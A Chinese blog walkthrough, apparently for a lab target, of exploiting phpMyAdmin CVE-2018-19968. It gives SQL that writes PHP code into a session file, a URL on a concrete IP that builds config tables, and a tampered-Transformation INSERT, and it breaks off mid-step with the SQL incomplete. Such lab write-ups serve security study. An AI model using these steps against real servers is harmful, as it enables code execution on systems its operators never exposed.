phpMyAdmin Transformation 任意文件包含漏洞 (需登录PMASA-2018-6/CVE-2018-19968)

phpMyAdmin Transformation 任意文件包含漏洞 (需登录PMASA-2018-6/CVE-2018-19968)

2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞,影响4.8.0~4.8.3版本,CVE编号CVE-2018-19968。

这是一个需要登陆利用的漏洞,首先需要实现登陆,在已只用户名和密码的情况下我们先登陆查看查看网页情况,先实现手工注入再编写exp脚本,我们实验的是一个已经搭建好的靶机地址为:

靶机

在这里插入图片描述

登陆后查看

在这里插入图片描述

第一步:创建数据库并将PHP代码写入SESSION文件中

可以看见后台已经有很多创建的数据库了,咱们也来创建数据库点击SQL输入代码

CREATE DATABASE shanhe;
CREATE TABLE shanhe.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO shenhe.bar SELECT '<?php phpinfo(); ?>';

这里建议是使用个性化的数据库名,并且即用即删,相同的库名会导致一些错误,执行SQL语句后我们来看:

在这里插入图片描述

第二步:访问网页生产配置表

已经存在我们创建的数据库了,访问如下连接数据库shanhe中生成phpMyAdmin的配置表,得到如下结果即为成功

http://94.191.112.225/phpmyadmin/chk_rel.php?fixall_pmadb=1&db=shanhe

在这里插入图片描述

第三步:将篡改后的Transformation数据插入表pma__column_info

点击SQL输入如下sql语句,注意要把数据库名改为自己创建的数据库名

INSERT INTO `pma__column_info`SELECT '1', 'shanhe', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop'
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值